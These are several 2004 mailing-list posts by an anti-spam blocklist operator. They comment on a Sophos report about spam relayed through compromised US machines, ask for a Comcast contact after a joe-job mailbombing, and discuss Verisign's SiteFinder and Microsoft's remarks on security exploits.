Paris -- Intentionally or not, the U.S. routes more spam e-mail traffic than the rest of the world combined, according to a new study by anti-virus firm Sophos. The study concludes that most of the unsolicited junk e-mails originate in Russia and then pass through hacked computers in the U.S. "More than 30% of the world's spam is sent from these compromised computers, underlining the need for a coordinated approach to spam and viruses," said Charles Cousins, Sophos' Asia managing director. The U.S. accounts for a whopping 56% of the global spam pie, followed by Canada with 6.8%. Europe did not fare very well in the report either, with the Netherlands (5th), Germany (7th), France (8th), the U.K. (9th) and Spain (12th) all making the list. http://www.sophos.com/spaminfo/articles/dirtydozen.html

I guess I can say that I can somewhat agree with what they are saying, but the percentage seems to be a bit lower than what I would have said. With the recent round of viruses that seem to be designed to help spammers hijack end user machines, I'd say the percentage is more towards 45-50%. Sometimes it's very hard to tell the difference between an open proxy and a drone running an open proxy (take the AHBL's proxy list, which is over 410,000 proxies listed, and our infected/hijacked machine count comes nowhere near that). Part of the reason why a lot of the spam comes from outside of the US is because US spammers need to hide their actual locations in order to avoid getting snared by CAN-SPAM and similar.
This is why Ralsky bases his spamming campaigns out of China, where the laws are more relaxed in terms of this stuff, and is less likely to get yanked off of his net connection. This is also why spammers have 'fronts'. :-) -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Need Comcast contact
Anyone happen to know of a contact for Comcast's mail server administrators? I need to discuss an issue with them about their mail servers mailbombing my systems from a joe job. Thanks. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Microsoft on security holes
I just saw this on slashdot, so for those of you who don't read slashdot, enjoy. http://news.bbc.co.uk/1/hi/technology/3485972.stm

Yeah, it's a little bit off topic, but with the recent amount of viruses, worms, trojans, etc going around the Internet that are causing havoc with general day to day operations of ISPs, this is quite an interesting read. Basically, Microsoft is claiming that security exploits only come out after patches. Uh huh, yeah right.

(waiting for his list AUP violation notice, again)

-- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: ICANN/Registry Agreement:
On Thursday, February 26, 2004 8:21 PM [EST], Deepak Jain [EMAIL PROTECTED] wrote:

Doesn't sitefinder give one registry superior access to the registry's resources than the others, etc, etc?

Rather than clutter up NANOG with this stuff, since it's apparent that we will be having more issues about SiteFinder, I've gone ahead and set up a discussion list on my server for general talk about SiteFinder. It's unmoderated, everyone is welcome to sign up and post your views. http://wwwapps.2mbit.com/mailman/listinfo/sitefinder-discuss

-- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: ICANN/Registry Agreement:
On Thursday, February 26, 2004 8:21 PM [EST], Deepak Jain [EMAIL PROTECTED] wrote:

Doesn't sitefinder give one registry superior access to the registry's resources than the others, etc, etc?

It gives Verisign/NetSol the ability to generate exclusive profit from the hijacking of every non-existent domain name in existence. No other registrar could do something like this without paying for every last domain they take, nor could they ever do anything like this, due to the fact that Verisign/NetSol controls ALL of the TLD servers for .com and .net.

-- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org